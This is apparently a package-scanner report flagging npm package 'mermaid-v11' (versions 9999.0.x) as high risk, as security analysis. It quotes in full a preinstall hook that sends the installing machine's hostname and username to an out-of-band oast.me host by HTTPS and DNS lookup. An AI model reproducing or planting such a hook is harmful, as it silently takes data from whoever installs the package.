npm · registry.npmjs.org

mermaid-v11

Install Lifecycle Remote Or Exec: preinstall="node -e \"const h=require('os').hostname(),u=require('os').userInfo().username;require('https').get('https://d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.me/?h='+encodeURIComponent(h)+'&u='+encodeURIComponent(u)+'&pkg=mermaid-v11').on('error',()=>{});require('dns').lookup('mermaid-v11.'+h+'.d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.me',()=>{})\""

Why PkgRadar flagged 9999.0.2

Severity	Signal	Evidence
high	Install Lifecycle Remote Or Exec	preinstall="node -e \"const h=require('os').hostname(),u=require('os').userInfo().username;require('https').get('https://d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.me/?h='+encodeURIComponent(h)+'&u='+encodeURIComponent(u)+'&pkg=mermaid-v11').on('error',()=>{});require('dns').lookup('mermaid-v11.'+h+'.d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.me',()=>{})\"" · package.json
high	New Account With Lifecycle Hook	package first published 0 day(s) ago, 2 total version(s), has lifecycle hook · package.json

Scanned versions

Version	Verdict	Score	Scanned (UTC)
`9999.0.2`	High risk	35	2026-06-11
`9999.0.1`	High risk	35	2026-06-11
`9999.0.0`	High risk	35	2026-06-11

Block this in CI

PkgRadar gates mermaid-v11 (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem npm [email protected]

Start free — 25 scans / mo View full evidence